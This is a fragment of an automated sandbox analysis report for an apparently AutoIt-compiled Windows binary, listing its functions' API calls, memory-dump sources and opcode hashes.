                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1255039815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 246472a61925077f0ce062fd926fe76963597eff5ae69a3ad94d9fcadac7f974
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD51C0B1900209ABEB10DFA5DC84EEFB778AF49704F04C41EF515A7241D7B8E905CB66
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3413494760-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2634073740-771828931
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2294789929-1287834457
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2483343779-2107944366
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00450720
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00450733
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: -----$SysListView32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4008455318-3975388722
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433D9E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00433E6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00433E80
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433E90
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: I=D
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2903788889-2605949546
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
